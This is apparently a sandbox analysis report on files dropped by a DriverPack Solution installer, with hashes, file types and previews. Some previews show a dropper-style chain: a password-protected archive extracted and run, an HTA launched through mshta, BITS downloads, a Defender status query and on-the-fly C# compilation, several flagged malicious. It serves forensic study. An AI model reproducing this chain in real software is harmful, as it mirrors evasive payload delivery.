      SHA-512:A6EB9F81A5E7A2E08E680E09CD5BE0654567A1B74293B0C62C16A7AE3BD55D16A5FE453CB50643120EF3A2BB69845B0824117E9BCC61119ED310C3625361C950
      Malicious:false
      Reputation:low
      Preview:window.languages["yo"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "ero Bluetooth",. "deviceclasses_bluetooth-single-for": "ero Bluetooth",. "deviceclasses_bluetooth-plural-main": "ero Bluetooth",. "deviceclasses_bluetooth-plural-for": "ero Bluetooth",. "deviceclasses_cardreader-single-main": "card reader",. "deviceclasses_cardreader-single-for": "card reader",. "deviceclasses_cardreader-plural-main": "card readers",. "deviceclasses_cardreader-plural-for": "card readers",. "deviceclasses_chipset-single-main": "chipset",. "deviceclasses_chipset-single-for": "chipset",. "deviceclasses_chipset-plural-main": "chipsets",. "deviceclasses_chipset-plural-for": "chipsets",. "deviceclasses_inputdev-single-main": ".r. tit.wole",. "deviceclasses_inputdev-single-for": ".r. tit.wole",. "deviceclasses_inputdev-plural-main": "awon .r. tit.wole",. "deviceclasses_inputdev-plural-for": "awon .r. tit.wole",. "deviceclass
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):83317
      Entropy (8bit):5.9006606129087
      Encrypted:false
      SSDEEP:
      MD5:444D9D0CAE5165C8CE7AF7E46935FA98
      SHA1:135916362BDD0A5E999D93FCAFE5988E985EA86B
      SHA-256:315C4F27B91F12E9D4BA155363001651CB494A728622A80CBE2DF96826042619
      SHA-512:4DA1BA8F5CEAC14A3477517DDD11316BA8749727652DB66BB81B52F970A43C65DB302BF16E3A5F4875BF84A64297F1FD0D1E1F6490A4C0D2DE64F4D55032FB0B
      Malicious:false
      Reputation:low
      Preview:window.languages["zh-cn"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "Bluetooth ..",. "deviceclasses_bluetooth-single-for": "Bluetooth ..",. "deviceclasses_bluetooth-plural-main": "Bluetooth ..",. "deviceclasses_bluetooth-plural-for": "Bluetooth ..",. "deviceclasses_cardreader-single-main": "...",. "deviceclasses_cardreader-single-for": "...",. "deviceclasses_cardreader-plural-main": "...",. "deviceclasses_cardreader-plural-for": "...",. "deviceclasses_chipset-single-main": "...",. "deviceclasses_chipset-single-for": "...",. "deviceclasses_chipset-plural-main": "...",. "deviceclasses_chipset-plural-for": "...",. "deviceclasses_inputdev-single-main": "....",. "deviceclasses_inputdev-single-for": "....",. "deviceclasses_inputdev-plural-main": "....",. "deviceclasses_inputdev-plural-for": "....",. "deviceclasses_lan-single-main": ".
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Unicode text, UTF-8 text, with very long lines (567)
      Category:dropped
      Size (bytes):84395
      Entropy (8bit):5.777193362304248
      Encrypted:false
      SSDEEP:
      MD5:FE94FE6DB6E03581EF8BE861B8C42B0D
      SHA1:A349A5E87BBD7065B757FF97F839A3AA30BCB6F4
      SHA-256:7EB9D9529A8C38490A8B76E7E7CA1CCD746E0B0C19FE672EAF71FD78769F9B18
      SHA-512:3573B64EF84C5E718D55EE14B636AB784A4454B6FA772169AC43AE42ED2781B6B13AFA29902C01C3B69EA7717DEB47995F190CBB828032BB36C67194DC3FF4F7
      Malicious:false
      Reputation:low
      Preview:window.languages["zh"] = {. plural: function (n) { return Number(0) },. "deviceclasses_bluetooth-single-main": "....",. "deviceclasses_bluetooth-single-for": "....",. "deviceclasses_bluetooth-plural-main": "....",. "deviceclasses_bluetooth-plural-for": "....",. "deviceclasses_cardreader-single-main": "...",. "deviceclasses_cardreader-single-for": "...",. "deviceclasses_cardreader-plural-main": "...",. "deviceclasses_cardreader-plural-for": "...",. "deviceclasses_chipset-single-main": "...",. "deviceclasses_chipset-single-for": "...",. "deviceclasses_chipset-plural-main": "...",. "deviceclasses_chipset-plural-for": "...",. "deviceclasses_inputdev-single-main": "....",. "deviceclasses_inputdev-single-for": "....",. "deviceclasses_inputdev-plural-main": "....",. "deviceclasses_inputdev-plural-for": "....",. "deviceclasses_lan-single-main": "...",. "devic
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:HTML document, ASCII text
      Category:dropped
      Size (bytes):2664
      Entropy (8bit):5.161694439818851
      Encrypted:false
      SSDEEP:
      MD5:6BCAB16CD99663B1093D10F827CA0323
      SHA1:47B2D7F33DA12D88095379FC8EA5BB7114CE75E9
      SHA-256:02BD627D6825599ED039F053FECBE7F15000B5D5071E9B6BAAB488BEFA4F02DD
      SHA-512:67C23C1F3E8023001336FF7FC9C9052220F2AB67DF280EF269B0239D67DFC67E6783DDA44DEC747BA6689C239D7EFDB55262D098868E43AB70A055429349210E
      Malicious:false
      Reputation:low
      Preview: [if gt IE 6]>.<!DOCTYPE html>.<![endif]-->.<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" style="background-color: #004777;">.<head>. <title>DriverPack Solution</title>. <meta HTTP-EQUIV="MSThemeCompatible" content="yes">. <meta http-equiv="X-UA-Compatible" content="IE=9">.. { IF [NOSCRIPT] } -->. <noscript>. <meta http-equiv="refresh" content="10;URL='http://drp.su/error/noscript/'">. </noscript>.. <style>. html, body {. width: 100%;. height: 100%;. margin: 0;. padding: 0;. }. .hta-loading-screen {. position: fixed;. width: 100%;. height: 100%;. top: 0;. left: 0;. z-index: 9999;. background: #006a7b;. background: linear-gradient(to right, #006a7b 0%,#00b4a8 100%);. filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#006a7b', endColorstr='#00b4a8',GradientType=1 );. }. .hta-loading-screen_logo {. position: absolute;. top: 50%;. left: 50%;
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:DOS batch file, ASCII text
      Category:dropped
      Size (bytes):90
      Entropy (8bit):4.859986191433918
      Encrypted:false
      SSDEEP:
      MD5:F66F13D4770EB90E6D81222FE3525A3F
      SHA1:F21BC06A179C108D13C783600B98EA0641076127
      SHA-256:88EBE6FC9F45E734243DD674A3CDD9222BE692BDE089D0BC06726DD32156B892
      SHA-512:3F321A339DEE086F474D5AC9E8B247805D070B6C0AB5F9D85C5F1075021A3EB7AE23AB2B577000ADC30AD32E66A1E291993F435F8539BB0032A1ACA038E1F1B2
      Malicious:false
      Reputation:low
      Preview:@echo off.cd /d "%~dp0".start "%WINDIR%\system32\mshta.exe" "%~dp0run.hta" --sfx %1.exit.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):40470
      Entropy (8bit):4.78839458251551
      Encrypted:false
      SSDEEP:
      MD5:DB65E13306DD169152969FB8AF316396
      SHA1:4D15CB0254550E2CD195CD18662D9503E2AB6548
      SHA-256:E8F8E1DCEFD800FBF3F993A7E40B1EBD6D6229CCEF5EAA389CA5DB2F0F4152CB
      SHA-512:BDF298BBD0ED7FAA17C4485B8D172EEFA29B25239CC1C3E9A536404503120BCF8ED1FAE6E98341B2A988B21486B61DD97106A0512D981C51B71A9816F5B1A0A6
      Malicious:false
      Reputation:low
      Preview:.OPTION EXPLICIT...Set CabinetNameTemplate=example.cab...Set DiskDirectoryTemplate=CDROM...Set CompressionType=MSZIP...Set UniqueFiles="ON"...Set Cabinet=on...Set DiskDirectory1=C:\Users\DRP\Desktop...Set SourceDir=C:\Users\DRP\Desktop\DriverPack......C:\Users\DRP\Desktop\DriverPack\audio..C:\Users\DRP\Desktop\DriverPack\config.js..C:\Users\DRP\Desktop\DriverPack\css..C:\Users\DRP\Desktop\DriverPack\DriverPackSolution.html..C:\Users\DRP\Desktop\DriverPack\drp.css..C:\Users\DRP\Desktop\DriverPack\drp.js..C:\Users\DRP\Desktop\DriverPack\filelist.txt..C:\Users\DRP\Desktop\DriverPack\img..C:\Users\DRP\Desktop\DriverPack\js..C:\Users\DRP\Desktop\DriverPack\languages..C:\Users\DRP\Desktop\DriverPack\programs..C:\Users\DRP\Desktop\DriverPack\run.hta..C:\Users\DRP\Desktop\DriverPack\start.bat..C:\Users\DRP\Desktop\DriverPack\Tools..C:\Users\DRP\Desktop\DriverPack\audio\ru..C:\Users\DRP\Desktop\DriverPack\audio\ru\ANTIVIRUS-1.mp3..C:\Users\DRP\Desktop\DriverPack\audio\ru\ANTIVIRUS-2.mp3..C:\Use
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:7-zip archive data, version 0.4
      Category:dropped
      Size (bytes):12440274
      Entropy (8bit):7.999985618855094
      Encrypted:true
      SSDEEP:
      MD5:4354DF0A9A59DF39D5CFB2C4636A5F85
      SHA1:E0490AB9C6BBE6ECCCB7AC9CE8E266DB3D0BA7DB
      SHA-256:DFE2955BA24AD28704E059FE567902CE9F878C9D6F95184B82D95753E151757C
      SHA-512:6E208C9A9BDCF917810BAEAD0853E401C3CEBD7D8746A57F24BCE0B86FBFD2AD4A0D6EF50CDFAC608C767F6B8417842588D301986AC63794864E4A4D98A78899
      Malicious:false
      Reputation:low
      Preview:7z..'......;p......B........Cl......9......R`A....*...A>..B2..Y...y.`....b....;.VY.s...|fE..WUH.=.8.%..m....(l.(.Km...?v..M..j..F...z.:{....RdA?.....I....g.y.9.UA..6..;.h..?....>......,.HoG..3....,'..ak.,..&T....'MKu.F.".UC.u..U"D%...J|-b|....zc..:....n)N.y..O.K5.=.....[..B..V.....Z..>y....v.....dt....=.&...&.>....N..u.p.r.kQ......Vp2[..,.F..u.l.0...n..[.hn..<...yn..S.^...<.F.:'..**..:.sa."F...1.n.gn?..L...2r<wG....c..9.it'...&w.6.._9.X.....k..A..,.D*.9.....8....hV.I.b.^........r$.'..F.......%.]..L&<.......I...?..0...s.,.E.e..&56..q.y.....H....P...X..M....'....a.a>..._....u.F.${:.;.-L....&q.w...g,C.....,...... v.*Q.).....iE.....a.I....U...`...@U..x.~'$\......J....!.&T...w....?Z2..G....j.R.~..).......D...%.....`...{+..H.Y.pW...;g...9.Z...0U.I.:<c..@..%U..%.Gc....@.k.Qi.4H..YRU.].].fI..j.u.I...M..v.T.*..^.c..J............D...:.g.[..D..,)..R.z5.Xg.6Pk...g..fU@..P....<.p[Q.2.....R\...hM....b.=....rDkf.[8....N...../.F....(.:(Q.i.HU
      Process:C:\Windows\SysWOW64\expand.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):86
      Entropy (8bit):4.47458803671569
      Encrypted:false
      SSDEEP:
      MD5:232EBF167EA35163EA69A1570BE7B03E
      SHA1:B8BC8C8B3F9EBF83EC43244A934389BD98849A0A
      SHA-256:030EE398E53CAF0928E757162F3C7BE7D593A59DDE2795991EC7E4FD8E71F2E3
      SHA-512:EFE7D716B4C2553B1DC295271B1BB32FCCF12E2B64E6DE7ADBF5F8284BDEE1C3A92B5A227C46A6BFF6C1298D2E7319B73B7A75651710CAD84564F0C4EC4C917F
      Malicious:false
      Reputation:low
      Preview:cd /d "%~dp0"..rmdir /s /q ext..7za.exe x -y -aoa -pbeetle arc.7z -oext..ext\start.bat
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):483
      Entropy (8bit):5.3417790716537015
      Encrypted:false
      SSDEEP:
      MD5:D5F17B6981F1A1611D6FD058CE1BAA06
      SHA1:A8D8E1D7CAA4FD9045941B8D4955A120AEB1DF1A
      SHA-256:5E5FFA8C30FD1FC87DC9D1F054369C9F94C38A11D8B97C2291F72DDEC89227BE
      SHA-512:7C0825F75085638A6C40D8FBE6C137B1A47158BDFCC0BA228A5FD5D0915480FCD09558CD405AE7ABCA5C36A736DEB981CCA461444DAE3815249295180154E270
      Malicious:false
      Reputation:low
      Preview:..7-Zip (a) 22.01 (x86) : Copyright (c) 1999-2022 Igor Pavlov : 2022-07-15....Scanning the drive for archives:..1 file, 12440274 bytes (12 MiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z..--..Path = C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z..Type = 7z..Physical Size = 12440274..Headers Size = 7874..Method = LZMA2:24 BCJ 7zAES..Solid = +..Blocks = 3....Everything is Ok....Folders: 46..Files: 584..Size: 28739126..Compressed: 12440274..
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):97
      Entropy (8bit):4.8714102347361194
      Encrypted:false
      SSDEEP:
      MD5:692519A473D6059F79F9842FE5909D9A
      SHA1:4EB2D507AC92698323F3090E1C86803578C288C2
      SHA-256:0AC2AB1931DAEB76DBB8E8B541D0C0EDD6D2C5E4B3C88B1BE7F07FAFCD791293
      SHA-512:26D2E1A8A2B4323161006DAD115CA35551308F7A71CC9699DCEF4FF509987DDAD90C4366BA0F7A416155B7849A97B383DDC2EA5CF834A55EC9EB0A258A7BD375
      Malicious:true
      Reputation:low
      Preview:{2A32ED18-11CB-4473-9D5C-6BB49766C352} 'dwnl-task-48795' TRANSFERRING 0 / 1 11796480 / 13140694..
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):20
      Entropy (8bit):3.9841837197791885
      Encrypted:false
      SSDEEP:
      MD5:9E00F11F00347EF02ECD887421949976
      SHA1:19336FF0E359C438CF36066BA280A2708EF8155E
      SHA-256:81B79A00C56F9B67C0FBF6067FD154329AB549A774E80B8817570215EB45ADCB
      SHA-512:BF036D57334EF277CF25823614B20F9C911E88290D2147C1A418261EF5107DB7EA853B9FC803E1B11552F0E6C143AA406A3A6FA289EE6B6F4D4E7B445948F709
      Malicious:true
      Reputation:low
      Preview:Transfer complete...
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1607
      Entropy (8bit):4.374367108199559
      Encrypted:false
      SSDEEP:
      MD5:CD985AF3F83E08CCFC66E07FA9660CCD
      SHA1:AC25B7412E72F0F1BD2970C0E8FF1CBB9C69C807
      SHA-256:78D4A8F6C4D40105AF36F43A5599304EA21E440399C03F6D154B24DA5900AF79
      SHA-512:39396FCE382F77F58E779A8098A16BD2A8D664E15F94EF52A2216BF5CAC859C149D011CA44DA49386B74A7FFBC26DF8FA0DA69A4DD0C18D279128EED53DE8B9F
      Malicious:false
      Reputation:low
      Preview:....AMEngineVersion : 1.1.18200.4..AMProductVersion : 4.18.2104.14..AMRunningMode : Normal..AMServiceEnabled : True..AMServiceVersion : 4.18.2104.14..AntispywareEnabled : True..AntispywareSignatureAge : 812..AntispywareSignatureLastUpdated : 6/7/2021 8:15:48 AM..AntispywareSignatureVersion : 1.341.239.0..AntivirusEnabled : True..AntivirusSignatureAge : 812..AntivirusSignatureLastUpdated : 6/7/2021 8:15:47 AM..AntivirusSignatureVersion : 1.341.239.0..BehaviorMonitorEnabled : False..ComputerID : AAE72AF9-9507-4039-A3C5-8ABBDC680A7E..ComputerState : 0..FullScanAge : 4294967295..FullScanEndTime : ..FullScanStartTime : ..IoavProtectionEnabled : True..IsTamperProtected : True..IsVirtualMachine : False..LastFullScanSource
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):1228
      Entropy (8bit):3.4682639846873
      Encrypted:false
      SSDEEP:
      MD5:4F64204DA5089CBF69E77890BD474C3F
      SHA1:E1D54AEC771D469DA3E5DFEC258CA9AE7B35B535
      SHA-256:3B91E30E86635BB80111BC9101537E68CC79A01A5C1026C628FC9469D85FF7CC
      SHA-512:CD815BABBFA0F33843CCB1E3C834AC6FC6E75C4731ECFDC90E70D6301F38BA0FD6A915F5D967511C95A9F25B04669A2DE02C1BD6C75C1E2300D02070BA102DFF
      Malicious:false
      Reputation:low
      Preview:..O.K.:. .B.I.T.S. .-. .D.a.t.a. .t.r.a.n.s.f.e.r.........O.K.:. .B.I.T.S. .-. .D.o.w.n.l.o.a.d. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........O.K.:. .F.i.l.e. .d.o.w.n.l.o.a.d. .c.o.m.p.l.e.t.e.d.........O.K.:. .F.i.l.e. .i.s. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .p.r.e.s.e.n.t. .o.n. .d.i.s.k.........I.N.F.O.:. .T.r.y.i.n.g. .t.o. .r.e.a.d. .t.h.e. .f.i.l.e. .c.o.n.t.e.n.t...............O.K.:. .F.i.l.e. .c.o.n.t.e.n.t. .w.a.s. .r.e.a.d. .s.u.c.c.e.s.s.f.u.l.l.y.........O.K.:. .U.n.p.a.c.k.i.n.g. .C.A.B.-.a.r.c.h.i.v.e.........O.K.:. .U.n.p.a.c.k.i.n.g. .7.Z.i.p. .a.r.c.h.i.v.e. .w.i.t.h. .p.a.s.s.w.o.r.d.........I.N.F.O.:. .[.A.d.m.i.n. .r.i.g.h.t.s.]. .C.h.e.c.k.i.n.g. .t.h.a.t. .a.d.m.i.n. .r.i.g.h.t.s. .a.r.e. .o.b.t.a.i.n.e.d.:. .1. ./. .6.........I.N.F.O.:. .[.A.d.m.i.n. .r.i.g.h.t.s.]. .F.i.l.e. .l.o.g._.r.u.n.A.s.A.d.m.i.n...t.x.t. .e.x.i.s.t.s.........I.N.F.O.:. .[.A.d.m.i.n. .r.i.g.h.t.s.]. .F.i.l.e. .l.o.g._.r.u.n.A.s.A.d.m.i.n...t.x.t. .r.e.a.d. .s.u.c.c.e.s.s.f.u.l.l.y...
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):599
      Entropy (8bit):4.937332707345846
      Encrypted:false
      SSDEEP:
      MD5:AB2B89B81B9A616C177E356624E3BB93
      SHA1:2AD1267FD6D70BD5025B87A295320041B23E69BA
      SHA-256:597FC7F1D24B74D098986387D4B7D44E048BDF141FD04D392646CEEC94A8573E
      SHA-512:50131B5CC779D0E19052AA6DB517164C901FE9DFF73BD60B552C835400C2D1603C9B9B3C0FD70D309FB200703A759456A292A4CCE07606DFCB6D65CDEE636F3B
      Malicious:false
      Reputation:low
      Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Adding C:\Users\user\AppData\Local\Temp\beetle-cab\7za.dll to Extraction Queue..Adding C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe to Extraction Queue..Adding C:\Users\user\AppData\Local\Temp\beetle-cab\7zxa.dll to Extraction Queue..Adding C:\Users\user\AppData\Local\Temp\beetle-cab\arc.7z to Extraction Queue..Adding C:\Users\user\AppData\Local\Temp\beetle-cab\start.cmd to Extraction Queue....Expanding Files ......Progress: 3 out of 5 files..Expanding Files Complete .....5 files total...
      Process:C:\Windows\SysWOW64\cmd.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4
      Entropy (8bit):2.0
      Encrypted:false
      SSDEEP:
      MD5:0D076BA36266D85EB56CAD903DAA6B88
      SHA1:EFF33C54516BCA3D426493BC7EF4B87C3F2E8601
      SHA-256:9ACA8DFCE962538FB8131D73F84CADA05E4DC79F5A0D3612C511B1150F3E33E2
      SHA-512:53E86D2855340A1F89B5CE1B733AE928FF33101A29568F3C2E24BFB843288D1B8EE2F713A38AFCAE5FCC88D114AFCBD04277F0D2A3E013DD9E106E2B3946B07F
      Malicious:false
      Reputation:low
      Preview:0 ..
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:MSVC .res
      Category:dropped
      Size (bytes):652
      Entropy (8bit):3.0951389054908893
      Encrypted:false
      SSDEEP:
      MD5:B109987926D913B62758AF717901E704
      SHA1:95504F9540808591304FBE3C58F874AA44E7E639
      SHA-256:AAF1F8F43BEB8C39273FEA6E09C8B8619CECC87A985FBC76EC3066B800A7CAAA
      SHA-512:07A8C9BE73787B1AB3075B0C5285D88886524BF95DD4AC764E604E7F83503209FB39810891D143AB6A8A924483C1A554180643D354D83B7D3F6672B6B85604BA
      Malicious:false
      Reputation:low
      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.2.l.i.g.m.z.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.2.l.i.g.m.z.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (374)
      Category:dropped
      Size (bytes):496
      Entropy (8bit):4.987762293621136
      Encrypted:false
      SSDEEP:
      MD5:91758722DC7E495CAA693882723676A2
      SHA1:7DC3B526C084605A82ACF57F3F1884795B67A7B8
      SHA-256:AFAEE024B1D79B00A1DB67CB4F03BC2DAD739022FB6030D0C81CBC00A6E1ACB1
      SHA-512:0CDAD9195C3AB82E0DA68FB1783ECC2636D7B3B646B500E37ACEC48E87A05D1312E258CF11A6CA8BE1E7E43AC34030846EA3339900891E83A596470C1DC6BA7F
      Malicious:false
      Reputation:low
      Preview:.using System;.using System.Runtime.InteropServices;..namespace Win32.{. public class NativeMethods. {. [DllImport("user32.dll")] public static extern int SendMessage(int hWnd, int hMsg, int wParam, int lParam);[DllImport("user32.dll")] public static extern IntPtr GetWindow(IntPtr hWnd, uint uCmd);[DllImport("user32.dll", EntryPoint = "FindWindowEx")] public static extern IntPtr FindWindowEx(IntPtr hwndParent, IntPtr hwndChildAfter, string lpszClass, string lpszWindow);.. }..}.
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
      Category:dropped
      Size (bytes):367
      Entropy (8bit):5.241448739298017
      Encrypted:false
      SSDEEP:
      MD5:87B1AF3566F293297B31DF7B615B070A
      SHA1:EB8549EAB1A2A677377DA36C433B6DCB1A665715
      SHA-256:287DF2D2367014C75E260368658B355B02D40638F4616CAE5505C1AF1A5AD504
      SHA-512:2067DC99AF9F8EBFEF9951EC7D212C7C7BFA80B698FF7BA687C2323A8B1658272B7B7AF8A2EFA0E167CA7B23487DF1F7D70B8345A2E5D85DCF44442881AFCEF8
      Malicious:true
      Reputation:low
      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.0.cs"
      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Category:dropped
      Size (bytes):3584
      Entropy (8bit):2.6927275418389223
      Encrypted:false
      SSDEEP:
      MD5:016EE1426F77CAF2C4F5516CE69F678D
      SHA1:254BCFF9BAD2D5855D235FA0331D723F5E56B3A7
      SHA-256:6F648433E4A36F6D2DC345AE612BF4F4AC4252103796C75E067F0F5C18F5CAA6
      SHA-512:9961EA06A7D78902D45D023C5E22B9CBE535D017414D37DC2833CC1BD675916FE52EBE452232E1458774B038F77E77CCAB2C4FC1E67AFEA0B73B87856255A837
      Malicious:false
      Reputation:low
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ $......H.......X ................................................................(....*BSJB............v4.0.30319......l...`...#~......\...#Strings....(.......#US.0.......#GUID...@...X...#Blob...........G.........%3............................................................;.4...............=.......................%.............. B............ N............ X.....P ......e. .......k.....p.....u.....|.....k.................................e.$...e. .!.e.)...e. ...........7.P.....B...
      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (476), with CRLF, CR line terminators
      Category:dropped
      Size (bytes):897
      Entropy (8bit):5.328568404470379
      Encrypted:false
      SSDEEP:
      MD5:C85037153A27158CB898694F6F982459
      SHA1:4B42AECDF9320CB2049F894A9786B53D2EA78904
      SHA-256:D14833506A1913C52E447EC411D152F670DB6352BB77ABD258D28F5EACC26870
      SHA-512:A494B8B621225AD73D2D0AB3A86FA9A7EA48A4A37F1DCC420FA382B85787F4CEEAB65F54DD449CCB0CBCAC2A2BBCB09469E133469468B5FDC9BEB5154630618B
      Malicious:false
      Reputation:low
      Preview:.C:\Users\user\AppData\Local\Temp\beetle-cab\DriverPack> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\e2ligmzk\e2ligmzk.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3752.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:HTML document, ASCII text, with very long lines (951), with CRLF, LF line terminators
      Category:modified
      Size (bytes):517289
      Entropy (8bit):5.533918780099732
      Encrypted:false
      SSDEEP:
      MD5:973913A37A6E146927DC34ACA5156F29
      SHA1:DA82A560AE82B00E3BCA9F3918FFD9360AB25A77
      SHA-256:252758867E7365E47E738BCEBC4685132C9837EC6812A65889D9B95C37DDDD5E
      SHA-512:E894399CAD0EDD749DAB44E18DAA1153E8C6E69A94954B8B051749177607EF269AE921F2A860808A312EC98C39915E6FCBF9A84D11DE4F696D1DE825F3D56B56
      Malicious:false
      Reputation:low
      Preview:<html>.<head>. <meta charset='windows-1251'/>. <script type='text/javascript' src='http://static.drp.su/update/logs/script.js'></script>. <link rel='stylesheet' type='text/css' href='http://static.drp.su/update/logs/style.css'/>.</head>.<body>.<script type="text/javascript">window.data = [];</script>.... <div class="logs debug"><span class="timeStamp">11:34:13</span>[core:statistics:clientIdStorage:generate] generated clientId: 900961970.4220395602<pre class="code">{.."key": "clientId",.."value": "900961970.4220395602".}</pre></div>. <script type="text/javascript">window.data.push({"type":"log","data":{"lvl":"debug","tags":[],"namespace":"core:statistics:clientIdStorage:generate","message":"generated clientId: 900961970.4220395602","params":{"key":"clientId","value":"900961970.4220395602"}},"timestamp":1693215253276});</script>. <script type="application/json" class="data">{"type":"log","data":{"lvl":"debug","tags":[],"namespace":"core:statistics:clientIdStorage
      Process:C:\Windows\SysWOW64\mshta.exe
      File Type:Unicode text, UTF-16, little-endian text, with very long lines (379), with CRLF line terminators
      Category:dropped
      Size (bytes):1356
      Entropy (8bit):3.64525728358513
      Encrypted:false
      SSDEEP:
      MD5:DC881B4ABA8B9773F3ECE9A03E047782
      SHA1:2792B744752A2E4A7B44A1FECF956DAAB2DEEF7A
      SHA-256:94CAEB3B72600CFCB447B92429EE50B3D6F3228405101596AD43540A3521F804
      SHA-512:17DFD555D54DABB67679B28BEDECF8113573A12766C8AB724215C7DD126D7ED72AE6B6DACB75E698F4EB92209E53AC84D604002E92F7BCCE2100E3FC9300D579
      Malicious:true
      Reputation:low
